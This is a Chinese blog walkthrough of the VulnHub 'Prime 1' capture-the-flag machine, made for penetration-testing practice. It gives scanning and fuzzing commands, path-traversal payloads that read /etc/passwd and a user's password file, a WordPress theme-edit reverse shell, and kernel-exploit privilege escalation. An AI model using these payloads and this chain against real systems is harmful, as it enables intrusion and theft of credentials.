vulnhub - Prime 1 (考点:信息搜集 & LFI &WordPress安全& linux ubantu提权)

最新推荐文章于 2024-06-14 02:18:42 发布
最新推荐文章于 2024-06-14 02:18:42 发布
阅读量398 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105759584
版权

https://www.vulnhub.com/entry/prime-1,358/

nat网络
arp-scan -l 比平常扫出来多的ip就是靶机了

nmap 很常规80想到进web搜集信息,22想到可能有ssh登录

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
|   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_  256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
MAC Address: 00:0C:29:AE:D2:A3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

拿dirb或dirbuster扫,发现WordPress的目录,这就是个wp博客,看到这个博客就要想到wpscan扫它,然后找可能的用户登录或插件漏洞。

扫用户,发现一个。扫插件,有个很老,但是那个版本我没搜到漏洞

wpscan --url http://192.168.189.203/wordpress/ --enumerate u
wpscan --url http://192.168.189.203/wordpress/ --plugins-detection aggressive

基本就是找密码登录然后进去改theme的php页面拿shell这个套路了

现在问题是密码在哪,继续搜集

dirbuster或dirb扫到一个secret.txt文件

在这里插入图片描述
叫你用wfuzz扫,还给了wfuzz学习界面。要求扫到location txt

wfuzz这个工具里的FUZZ就像代数那样,是你设的x,然后能扫出x是啥。FUZZ的位置要么放前面成为域名前缀,要么放后面是子域名

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 500 http://192.168.189.203/index.php?FUZZ=location.txt

在这里插入图片描述
就这个是8l与众不同所以是他,

http://192.168.189.203/index.php?file=location.txt

进入后又给提示
在这里插入图片描述

要求换个php ,之前我们扫的目录有image php

在这里插入图片描述

这次放后面才搜得到

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 500 http://192.168.189.203/image.php?secrettier360=FUZZ

是dev
在这里插入图片描述

然后打开看
在这里插入图片描述
就没了

但是这就像file=什么这样,是个LFI漏洞

只不过这次file换成了secrettier360

测试

http://192.168.189.203/image.php?secrettier360=../../../../../../etc/passwd

发现
在这里插入图片描述

底下还隐藏了密码信息提示

在这里插入图片描述

根据提示,继续看密码存放的路径

http://192.168.189.203/image.php?secrettier360=../../../../../../home/saket/password.txt

在这里插入图片描述

ok找到了,结合之前发现的用户,然后进入wp登录界面,可以从之前的扫目录工具里找到,不是login就是admin

进去后就是之前说的老套路了。

theme-edit 修改一个php页面,换上自己的弹shell php代码这个或者随便其他你喜欢用的

只不过这次很多php不让修改。但是可以找到secret php 这个是可以修改的
在这里插入图片描述
改好后,做多了就知道php存放的路径了,或者根据目录扫描工具找。总是存放在content-theme-下面

点击

192.168.189.203/wordpress/wp-content/themes/twentynineteen/secret.php

收到shell
tty: python -c 'import pty; pty.spawn("/bin/bash")'

老套路linpeas.sh自动扫

发现这个
在这里插入图片描述
但是老要输入密码,扎到saket目录下的密码文件又没效。搞不懂是啥回事

看看是否能版本提前, ubantu漏洞多

提权工具

./linux-exploit-suggester.sh -k 4.10.0

第一个就可以试试,打开工具给的exploitDB地址。下载下来考到靶机 进行gcc编译。然后直接成功root
在这里插入图片描述
在这里插入图片描述

冬萍子
关注
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 127.0.0.1 www.baidu.com www.google.com 2,python threading-find-port-8009.py 将会生成8009.txt,作用为扫描ip.txt中域名/ ip查找开放8009...
prime 1 靶场渗透测试
Jianmuhtb的博客
07-27 1099
靶机:prime1 下载地址:https://download.vulnhub.com/prime/Prime_Series_Level-1.rar攻击机:kali Linux2023.2环境:VMware网络:两机均为nat。
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1772
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
红队打靶:Prime1详细打靶思路之模糊测试+内核提权vulnhub
Bossfrank的博客
06-11 1757
本篇博客详述了vulnhub靶机prime1的打靶思路过程,并非简单复现writeup。打靶过程涉及到关于模糊测试及wfuzz工具的使用、文件包含漏洞利用、wordpress CMS、内核漏洞提权。有关OpenSSH渗透的方法将在下一篇博客中详述。
Vulnhub实战-prime1
2301_76869453的博客
09-16 421
VulnHub 是一个面向信息安全爱好者和专业人士的虚拟机(VM)漏洞测试平台。它提供了一系列特制的漏洞测试虚拟机镜像,供用户通过攻击和漏洞利用的练习来提升自己的安全技能。本次,我们本次测试的是prime1。
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 1731
Vulnhub靶场Prime_Series_Level-1渗透
lfi-fuzz:用于枚举并尝试从LFI漏洞获取代码执行的python脚本
05-04
选项:-h,--help显示此帮助消息并退出-u URL,--url = URL您要测试的URL: : page LFI --traversal -file = TRAVERSAL_FILE(OPTIONAL)指定您自己的文件以使用LFI搜索-默认情况下为/ etc / passwd,但是某些php...
[Timeline Sec] - CVE-2020-9484:Tomcat Session 反序列化复现1
08-03
在实际环境中,防御此类漏洞的方法包括正确配置Tomcat,避免使用可能暴露敏感信息或允许代码执行的组件,及时更新到安全的Tomcat版本,并采取严格的权限控制措施。 总之,CVE-2020-9484是Apache Tomcat中的一个重要...
nmap-nse-scripts:已定制或创建的Nmap NSE脚本
02-05
例如,"http-wordpress-login-lfi"脚本可能用来检查WordPress登录页面是否存在本地文件包含(LFI)漏洞,"http-wordpress-plugin-info"脚本可能用于获取安装的WordPress插件信息,以判断是否存在已知的安全风险。...
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 1075
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
vulnhubPrime1
开心星人的博客
06-19 1584
打开靶机,是ubuntu操作系统。 想要登录需要输入密码 发现一行重要的信息 我们的目的是在不知道密码的情况下,拿到该靶机的root权限我们需要知道目标靶机的ip地址需要知道虚拟机NAT网络的网段 目标靶机就在192.168.88.1/24这个C段下攻击机kali也是NAT网络,所以kali也在当前C段(其实直接查看kali的ip地址就可以了,因为kali和靶机在一个网段) 一般扫出来主机号很小的(如1、2)和很大的(如255、254)都不去考虑192.168.88.132是kali的ip地址 所以靶机的
prime1--vulnhub靶场通关教程
m0_74402888的博客
04-29 2284
是一个常用的命令行工具,用于从或向服务器传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。如果你得到了任何正确的参数,就按照下面的步骤操作。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。之前扫到了ssh,http wordpress,那密码对应的是什么服务呢。在现实生活中的渗透测试中,我们应该使用我们的工具来深入挖掘一个网站。//查看location.txt文件,你将得到下一步的行动指示//vm 编辑--查看虚拟网络编辑器,看到靶机的网段。
vulnhub靶场-Prime1
ad12456的博客
03-30 2894
靶场练习,
Vulnhub——prime1
最新发布
m0_66638011的博客
06-14 785
Vulnhub是一个提供各种漏洞环境的靶场平台,旨在帮助安全爱好者提升渗透测试技能。靶场中的环境大多是预先设计好的虚拟机镜像文件,这些镜像中包含了多种漏洞,用户需要通过VMware或VirtualBox等虚拟化软件运行这些镜像。每个靶场镜像都有明确的目标,通常是获取操作系统的root权限和查看flag,即所谓的“Boot2root”挑战。prime1靶场攻破过程:1、我们进行信息收集,我们发现这个靶场最重要的就是信息收集方面,通过wpscan、wfuzz与目录扫描工具发现了用户名与密码’
Vulnhub Prime1
Pai_Space
05-21 447
明确:《中华人民共和国网络安全法 》 Description This machine is designed for those one who is trying to prepare for OSCP or OSCP-Exam. This is first level of prime series. Some help at every stage is given. Machine is lengthy as OSCP and Hackthebox's machines are desig
红队笔记6-Prime1打靶流程-提权-OpenSSL解密(vulnhub
qq_63442530的博客
03-19 1212
本篇文章是根据靶场作者给出的提权通过openssl解密获得saket用户密码,在saket用户sudo -l提权成功,没有使用内核提权,也是作者想让我们学习openssl解密:1.enc运行密码的查找:find 找备份文件->缺少密码时可以通过查找备份文件可能存有密码2.密钥的处理:我们获得密钥,对其进行md5加密(md5sum)和16进制转换(od)3.openssl解密参数构造:查看openssl帮助文档,确定参数。
渗透测试vulnhub-prime
weixin_50683638的博客
11-25 2783
本次实验需要kali虚拟机和靶机(此次靶机版本为ubuntu16-04)靶机我们不知道ip。 kali和靶机默认nat模式即可 在kali(攻击机ip:192.168.3.129)扫描局域网内C段主机(探测靶机ip) nmap -sP 192.168.3.1/24扫描到靶机ip为192.168.130 扫描ip的端口服务nmap -P 1-65535 -A 192.168.3.130看到22和80端口开启 我们访问一下192.168.3.130查看源码发现并没有什么 我们先目录扫描看看有什么信息,有
vulnhub prime1通关提权详细思路
m0_61506558的博客
09-24 787
本次模拟渗透测试的流程,从确定目标域名、IP 、主机发现,进行信息收集域名、IP、端口、目录扫描、搜索引擎、网络空间搜索引擎、Git…… 漏洞扫描,利用msf集成的工具,漏洞利用,最终拿到root用户。1、主机发现我的攻击机选择的是kali,在本机我们可以试试找它的网段,方便Nmap进行扫描,我本地使用的是NAT技术,这样我们就可以找到它的网段模式描述特点场景Bridge桥接虚拟机使用物理机的网卡(有线或者无线),不用虚拟网卡,占用一个IP,需要配置IP以后访问互联网。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值